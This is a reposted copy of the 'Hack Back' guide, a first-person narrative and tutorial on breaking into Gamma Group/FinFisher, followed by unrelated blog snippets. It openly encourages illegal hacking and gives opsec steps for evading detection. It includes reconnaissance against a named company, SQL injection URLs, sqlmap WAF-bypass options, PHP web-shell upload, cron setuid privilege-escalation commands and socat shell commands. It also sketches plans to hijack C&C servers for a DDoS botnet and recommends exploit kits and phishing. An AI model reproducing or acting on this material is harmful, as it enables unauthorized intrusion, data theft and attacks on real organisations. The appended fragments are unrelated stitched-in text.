A DIY Guide for those without the pati

_   _            _      ____             _    _

| | | | __ _  ___| | __ | __ )  __ _  ___| | _| |

| |_| |/ _` |/ __| |/ / |  _ \ / _` |/ __| |/ / |

|  _  | (_| | (__|   <  | |_) | (_| | (__|   <|_|

|_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\_(_)

A DIY Guide for those without the patience to wait for whistleblowers

--[ 1 ]-- Introduction

I‘m not writing this to brag about what an 31337 h4x0r I am and what m4d sk1llz

it took to 0wn Gamma. I‘m writing this to demystify hacking, to show how simple

it is, and to hopefully inform and inspire you to go out and hack shit. If you

have no experience with programming or hacking, some of the text below might

look like a foreign language. Check the resources section at the end to help you

get started. And trust me, once you‘ve learned the basics you‘ll realize this

really is easier than filing a FOIA request.

--[ 2 ]-- Staying Safe

This is illegal, so you‘ll need to take same basic precautions:

1) Make a hidden encrypted volume with Truecrypt 7.1a [0]

2) Inside the encrypted volume install Whonix [1]

3) (Optional) While just having everything go over Tor thanks to Whonix is

probably sufficient, it‘s better to not use an internet connection connected

to your name or address. A cantenna, aircrack, and reaver can come in handy

here.

[0] https://truecrypt.ch/downloads/

[1] https://www.whonix.org/wiki/Download#Install_Whonix

As long as you follow common sense like never do anything hacking related

outside of Whonix, never do any of your normal computer usage inside Whonix,

never mention any information about your real life when talking with other

hackers, and never brag about your illegal hacking exploits to friends in real

life, then you can pretty much do whatever you want with no fear of being v&.

NOTE: I do NOT recommend actually hacking directly over Tor. While Tor is usable

for some things like web browsing, when it comes to using hacking tools like

nmap, sqlmap, and nikto that are making thousands of requests, they will run

very slowly over Tor. Not to mention that you‘ll want a public IP address to

receive connect back shells. I recommend using servers you‘ve hacked or a VPS

paid with bitcoin to hack from. That way only the low bandwidth text interface

between you and the server is over Tor. All the commands you‘re running will

have a nice fast connection to your target.

--[ 3 ]-- Mapping out the target

Basically I just repeatedly use fierce [0], whois lookups on IP addresses and

domain names, and reverse whois lookups to find all IP address space and domain

names associated with an organization.

[0] http://ha.ckers.org/fierce/

For an example let‘s take Blackwater. We start out knowing their homepage is at

academi.com. Running fierce.pl -dns academi.com we find the subdomains:

67.238.84.228   email.academi.com

67.238.84.242   extranet.academi.com

67.238.84.240   mail.academi.com

67.238.84.230   secure.academi.com

67.238.84.227   vault.academi.com

54.243.51.249   www.academi.com

Now we do whois lookups and find the homepage of www.academi.com is hosted on

Amazon Web Service, while the other IPs are in the range:

NetRange:       67.238.84.224 - 67.238.84.255

CIDR:           67.238.84.224/27

CustName:       Blackwater USA

Address:        850 Puddin Ridge Rd

Doing a whois lookup on academi.com reveals it‘s also registered to the same

address, so we‘ll use that as a string to search with for the reverse whois

lookups. As far as I know all the actual reverse whois lookup services cost

money, so I just cheat with google:

"850 Puddin Ridge Rd" inurl:ip-address-lookup

"850 Puddin Ridge Rd" inurl:domaintools

Now run fierce.pl -range on the IP ranges you find to lookup dns names, and

fierce.pl -dns on the domain names to find subdomains and IP addresses. Do more

whois lookups and repeat the process until you‘ve found everything.

Also just google the organization and browse around its websites. For example on

academi.com we find links to a careers portal, an online store, and an employee

resources page, so now we have some more:

54.236.143.203  careers.academi.com

67.132.195.12   academiproshop.com

67.238.84.236   te.academi.com

67.238.84.238   property.academi.com

67.238.84.241   teams.academi.com

If you repeat the whois lookups and such you‘ll find academiproshop.com seems to

not be hosted or maintained by Blackwater, so scratch that off the list of

interesting IPs/domains.

In the case of FinFisher what led me to the vulnerable finsupport.finfisher.com

was simply a whois lookup of finfisher.com which found it registered to the name

"FinFisher GmbH". Googling for:

"FinFisher GmbH" inurl:domaintools

finds gamma-international.de, which redirects to finsupport.finfisher.com

...so now you‘ve got some idea how I map out a target.

This is actually one of the most important parts, as the larger the attack

surface that you are able to map out, the easier it will be to find a hole

somewhere in it.

--[ 4 ]-- Scanning & Exploiting

Scan all the IP ranges you found with nmap to find all services running. Aside

from a standard port scan, scanning for SNMP is underrated.

Now for each service you find running:

1) Is it exposing something it shouldn‘t? Sometimes companies will have services

running that require no authentication and just assume it‘s safe because the url

or IP to access it isn‘t public. Maybe fierce found a git subdomain and you can

go to git.companyname.come/gitweb/ and browse their source code.

2) Is it horribly misconfigured? Maybe they have an ftp server that allows

anonymous read or write access to an important directory. Maybe they have a

database server with a blank admin password (lol stratfor). Maybe their embedded

devices (VOIP boxes, IP Cameras, routers etc) are using the manufacturer‘s

default password.

3) Is it running an old version of software vulnerable to a public exploit?

Webservers deserve their own category. For any webservers, including ones nmap

will often find running on nonstandard ports, I usually:

1) Browse them. Especially on subdomains that fierce finds which aren‘t intended

for public viewing like test.company.com or dev.company.com you‘ll often find

interesting stuff just by looking at them.

2) Run nikto [0]. This will check for things like webserver/.svn/,

webserver/backup/, webserver/phpinfo.php, and a few thousand other common

mistakes and misconfigurations.

3) Identify what software is being used on the website. WhatWeb is useful [1]

4) Depending on what software the website is running, use more specific tools

like wpscan [2], CMS-Explorer [3], and Joomscan [4].

First try that against all services to see if any have a misconfiguration,

publicly known vulnerability, or other easy way in. If not, it‘s time to move

on to finding a new vulnerability:

5) Custom coded web apps are more fertile ground for bugs than large widely used

projects, so try those first. I use ZAP [5], and some combination of its

automated tests along with manually poking around with the help of its

intercepting proxy.

6) For the non-custom software they‘re running, get a copy to look at.  If it‘s

free software you can just download it. If it‘s proprietary you can usually

pirate it. If it‘s proprietary and obscure enough that you can‘t pirate it you

can buy it (lame) or find other sites running the same software using google,

find one that‘s easier to hack, and get a copy from them.

[0] http://www.cirt.net/nikto2

[1] http://www.morningstarsecurity.com/research/whatweb

[2] http://wpscan.org/

[3] https://code.google.com/p/cms-explorer/

[4] http://sourceforge.net/projects/joomscan/

[5] https://code.google.com/p/zaproxy/

For finsupport.finfisher.com the process was:

* Start nikto running in the background.

* Visit the website. See nothing but a login page. Quickly check for sqli in the

login form.

* See if WhatWeb knows anything about what software the site is running.

* WhatWeb doesn‘t recognize it, so the next question I want answered is if this

is a custom website by Gamma, or if there are other websites using the same

software.

* I view the page source to find a URL I can search on (index.php isn‘t

exactly unique to this software). I pick Scripts/scripts.js.php, and google:

allinurl:"Scripts/scripts.js.php"

* I find there‘s a handful of other sites using the same software, all coded by

the same small webdesign firm. It looks like each site is custom coded but

they share a lot of code. So I hack a couple of them to get a collection of

code written by the webdesign firm.

At this point I can see the news stories that journalists will write to drum

up views: "In a sophisticated, multi-step attack, hackers first compromised a

web design firm in order to acquire confidential data that would aid them in

attacking Gamma Group..."

But it‘s really quite easy, done almost on autopilot once you get the hang of

it. It took all of a couple minutes to:

* google allinurl:"Scripts/scripts.js.php" and find the other sites

* Notice they‘re all sql injectable in the first url parameter I try.

* Realize they‘re running Apache ModSecurity so I need to use sqlmap [0] with

the option --tamper=‘tamper/modsecurityversioned.py‘

* Acquire the admin login information, login and upload a php shell [1] (the

check for allowable file extensions was done client side in javascript), and

download the website‘s source code.

[0] http://sqlmap.org/

[1] https://epinna.github.io/Weevely/

Looking through the source code they might as well have named it Damn Vulnerable

Web App v2 [0]. It‘s got sqli, LFI, file upload checks done client side in

javascript, and if you‘re unauthenticated the admin page just sends you back to

the login page with a Location header, but you can have your intercepting proxy

filter the Location header out and access it just fine.

[0] http://www.dvwa.co.uk/

Heading back over to the finsupport site, the admin /BackOffice/ page returns

403 Forbidden, and I‘m having some issues with the LFI, so I switch to using the

sqli (it‘s nice to have a dozen options to choose from). The other sites by the

web designer all had an injectable print.php, so some quick requests to:

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1

https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1

reveal that finsupport also has print.php and it is injectable. And it‘s

database admin! For MySQL this means you can read and write files. It turns out

the site has magicquotes enabled, so I can‘t use INTO OUTFILE to write files.

But I can use a short script that uses sqlmap --file-read to get the php source

for a URL, and a normal web request to get the HTML, and then finds files

included or required in the php source, and finds php files linked in the HTML,

to recursively download the source to the whole site.

Looking through the source, I see customers can attach a file to their support

tickets, and there‘s no check on the file extension. So I pick a username and

password out of the customer database, create a support request with a php shell

attached, and I‘m in!

--[ 5 ]-- (fail at) Escalating

___________

< got r00t? >

-----------

\   ^__^

\  (oo)\_______

(__)\       )\/\

||----w |

||     ||

^^^^^^^^^^^^^^^^

Root over 50% of linux servers you encounter in the wild with two easy scripts,

Linux_Exploit_Suggester [0], and unix-privesc-check [1].

[0] https://github.com/PenturaLabs/Linux_Exploit_Suggester

[1] https://code.google.com/p/unix-privesc-check/

finsupport was running the latest version of Debian with no local root exploits,

but unix-privesc-check returned:

WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user

www-data can write to /etc/cron.hourly/mgmtlicensestatus

WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data

can write to /etc/cron.hourly/webalizer

so I add to /etc/cron.hourly/webalizer:

chown root:root /path/to/my_setuid_shell

chmod 04755 /path/to/my_setuid_shell

wait an hour, and ....nothing. Turns out that while the cron process is running

it doesn‘t seem to be actually running cron jobs. Looking in the webalizer

directory shows it didn‘t update stats the previous month. Apparently after

updating the timezone cron will sometimes run at the wrong time or sometimes not

run at all and you need to restart cron after changing the timezone. ls -l

/etc/localtime shows the timezone got updated June 6, the same time webalizer

stopped recording stats, so that‘s probably the issue. At any rate, the only

thing this server does is host the website, so I already have access to

everything interesting on it. Root wouldn‘t get much of anything new, so I move

on to the rest of the network.

--[ 6 ]-- Pivoting

The next step is to look around the local network of the box you hacked.  This

is pretty much the same as the first Scanning & Exploiting step, except that

from behind the firewall many more interesting services will be exposed. A

tarball containing a statically linked copy of nmap and all its scripts that you

can upload and run on any box is very useful for this. The various nfs-* and

especially smb-* scripts nmap has will be extremely useful.

The only interesting thing I could get on finsupport‘s local network was another

webserver serving up a folder called ‘qateam‘ containing their mobile malware.

--[ 7 ]-- Have Fun

Once you‘re in their networks, the real fun starts. Just use your imagination.

While I titled this a guide for wannabe whistleblowers, there‘s no reason to

limit yourself to leaking documents. My original plan was to:

1) Hack Gamma and obtain a copy of the FinSpy server software

2) Find vulnerabilities in FinSpy server.

3) Scan the internet for, and hack, all FinSpy C&C servers.

4) Identify the groups running them.

5) Use the C&C server to upload and run a program on all targets telling them

who was spying on them.

6) Use the C&C server to uninstall FinFisher on all targets.

7) Join the former C&C servers into a botnet to DDoS Gamma Group.

It was only after failing to fully hack Gamma and ending up with some

interesting documents but no copy of the FinSpy server software that I had to

make due with the far less lulzy backup plan of leaking their stuff while

mocking them on twitter.

Point your GPUs at FinSpy-PC+Mobile-2012-07-12-Final.zip and crack the password

already so I can move on to step 2!

--[ 8 ]-- Other Methods

The general method I outlined above of scan, find vulnerabilities, and exploit

is just one way to hack, probably better suited to those with a background in

programming. There‘s no one right way, and any method that works is as good as

any other. The other main ways that I‘ll state without going into detail are:

1) Exploits in web browers, java, flash, or microsoft office, combined with

emailing employees with a convincing message to get them to open the link or

attachment, or hacking a web site frequented by the employees and adding the

browser/java/flash exploit to that.

This is the method used by most of the government hacking groups, but you don‘t

need to be a government with millions to spend on 0day research or subscriptions

to FinSploit or VUPEN to pull it off. You can get a quality russian exploit kit

for a couple thousand, and rent access to one for much less. There‘s also

metasploit browser autopwn, but you‘ll probably have better luck with no

exploits and a fake flash updater prompt.

2) Taking advantage of the fact that people are nice, trusting, and helpful 95%

of the time.

The infosec industry invented a term to make this sound like some sort of

science: "Social Engineering". This is probably the way to go if you don‘t know

too much about computers, and it really is all it takes to be a successful

hacker [0].

[0] https://www.youtube.com/watch?v=DB6ywr9fngU

--[ 9 ]-- Resources

Links:

* https://www.pentesterlab.com/exercises/

* http://overthewire.org/wargames/

* http://www.hackthissite.org/

* http://smashthestack.org/

* http://www.win.tue.nl/~aeb/linux/hh/hh.html

* http://www.phrack.com/

* http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot

* http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash

* https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/

* https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers

(all his other blog posts are great too)

* https://www.corelan.be/ (start at Exploit writing tutorial part 1)

* http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/

One trick it leaves out is that on most systems the apache access log is

readable only by root, but you can still include from /proc/self/fd/10 or

whatever fd apache opened it as. It would also be more useful if it mentioned

what versions of php the various tricks were fixed in.

* http://www.dest-unreach.org/socat/

Get usable reverse shells with a statically linked copy of socat to drop on

your target and:

target$ socat exec:‘bash -li‘,pty,stderr,setsid,sigint,sane tcp-listen:PORTNUM

host$ socat file:`tty`,raw,echo=0 tcp-connect:localhost:PORTNUM

It‘s also useful for setting up weird pivots and all kinds of other stuff.

Books:

* The Web Application Hacker‘s Handbook

* Hacking: The Art of Exploitation

* The Database Hacker‘s Handbook

* The Art of Software Security Assessment

* A Bug Hunter‘s Diary

* Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier

* TCP/IP Illustrated

Aside from the hacking specific stuff almost anything useful to a system

administrator for setting up and administering networks will also be useful for

exploring them. This includes familiarity with the windows command prompt and unix

shell, basic scripting skills, knowledge of ldap, kerberos, active directory,

networking, etc.

--[ 10 ]-- Outro

You‘ll notice some of this sounds exactly like what Gamma is doing. Hacking is a

tool. It‘s not selling hacking tools that makes Gamma evil. It‘s who their

customers are targeting and with what purpose that makes them evil. That‘s not

to say that tools are inherently neutral. Hacking is an offensive tool. In the

same way that guerrilla warfare makes it harder to occupy a country, whenever

it‘s cheaper to attack than to defend it‘s harder to maintain illegitimate

authority and inequality. So I wrote this to try to make hacking easier and more

accessible. And I wanted to show that the Gamma Group hack really was nothing

fancy, just standard sqli, and that you do have the ability to go out and take

similar action.

Solidarity to everyone in Gaza, Israeli conscientious-objectors, Chelsea

Manning, Jeremy Hammond, Peter Sunde, anakata, and all other imprisoned

hackers, dissidents, and criminals!

A DIY Guide for those without the pati

时间: 2024-10-17 19:05:12

A DIY Guide for those without the pati的相关文章

网站入侵如此简单

原文地址:http://pastebin.com/raw.php?i=cRYvK4jb [需FQ] _ _ _ ____ _ _ | | | | __ _ ___| | __ | __ ) __ _ ___| | _| | | |_| |/ _` |/ __| |/ / | _ \ / _` |/ __| |/ / | | _ | (_| | (__| < | |_) | (_| | (__| <|_| |_| |_|\__,_|\___|_|\_\ |____/ \__,_|\___|_|\

200行代码实现简版react&#128293;

200行代码实现简版react?? 现在(2018年)react在前端开发领域已经越来越??了,我自己也经常在项目中使用react,但是却总是好奇react的底层实现原理,多次尝试阅读react源代码都无法读下去,确实太难了.前不久在网上看到几篇介绍如何自己动手实现react的文章,这里基于这些资料,并加入一些自己的想法,从0开始仅用200行代码实现一个简版react,相信看完后大家都会对react的内部实现原理有更多了解.但是在动手之前我们需要先掌握几个react相关的重要概念,比如组件(类)

F - Free DIY Tour(动态规划)

这道题也可以用深搜做,可以深搜本来就不熟,好久没做早忘了,明天看看咋做的 Description Weiwei is a software engineer of ShiningSoft. He has just excellently fulfilled a software project with his fellow workers. His boss is so satisfied with their job that he decide to provide them a free

EMC Networker And VMware Integration Guide

一.环境介绍 主机名称 IP 角色 版本 vcenter.xzxj.edu.cn 172.16.255.36 vcenter服务器 5.5 node01.xzxj.edu.cn 172.16.255.153 vsphere esxi 5.5 node02.xzxj.edu.cn 172.16.255.154 vsphere esxi 5.5 tsmbak.xzxj.edu.cn 172.16.255.80 networker服务器 8.2 ebr.xzxj.edu.cn 172.16.255.7

酷客多小程序DIY体系全面升级,还加入了这些新功能

在这个追求个性的时代,很多人都不愿追随大流,而是更喜欢DIY.首页模板的DIY功能一直都备受酷客多小粉丝的喜爱,昨晚伴随着扫码点餐一起推出的,还有模板DIY的全新页面.新的DIY界面加入了首页视频.背景.客服三个功能,操作流程相比之前简化了许多,商家只用拖动想要的组件到相应的位置并且链接到相应入口,就能完成模板的设计. 本次新增的DIY首页模板的三个新功能小编逐一介绍一下 1. 首页背景 新增的背景设置功能,商家可以自己设定首页的颜色或者是首页图片,使得小程序首页搭配更和谐,满足大部分追求个性化

ThoughtWorks笔试题之Merchant&#39;s Guide To The Galaxy解析

一.背景 在某网站上看到ThoughtWorks在武汉招人,待遇在本地还算不错,就投递了简历.第二天HR就打开电话,基本了解了一下情况(工作环境不错,男人妹子比例:1:1,双休,六险一金,满一年年假15天,病假8天,月薪1W--2W).然后立马收到一封:Coding Assignment的笔试题目.网上搜索了一下,发现这个公司还是挺大的,公司面试流程是出了名的繁杂和苛刻.据说有8轮:电话面试=>笔试=>Homework=>结对编程(中午管饭)=>技术面试=>PM面试=>

【我的技术我做主】IT屌丝DIY打造6盘位家用NAS服务器

一.为什么需要NAS存储? 一直以来用的百度云,并自己配置了一个2TB的硬盘做日常数据备份,后来发现百度云限速!而且存在各种各样的不安全(苹果事件.米国事件的都懂的啦!),而且自己2TB的硬盘一直没有做数据备份一直感觉不安全(搞IT人的心病),没有RAID数据安全无法保证,加上现在给孩子照相越来越多.蓝光高清.各种测试需要存储空间,NAS的需求越来越严重了,所以建立一个自己的NAS存储势在必行!当然在成本.造价.功能考虑,性价比当然是越高越好了! 二.硬件选型 1.主板 u 支持双千兆网口的(端

guide dpdk

Welcome to DPDK Guide! Contents: Setting up DPDK Important Prerequisites Setting up repositories Red Hat Enterprise Linux Fedora Installing DPDK and related software Hugepages 2M Hugepages 1G Hugepages IOMMU Binding NIC drivers VFIO VFIO no-IOMMU UIO

SQL procedure User&#39;s Guide

1. Ordering the SELECT Statement: 1.select 2. From 3. Where 4. Group by 5. Having 6. Order by select Continent, sum(Population) from sql.countries group by Continent having Continent in ('Asia', 'Europe') order by Continent; 2. The OUTOBS=option limi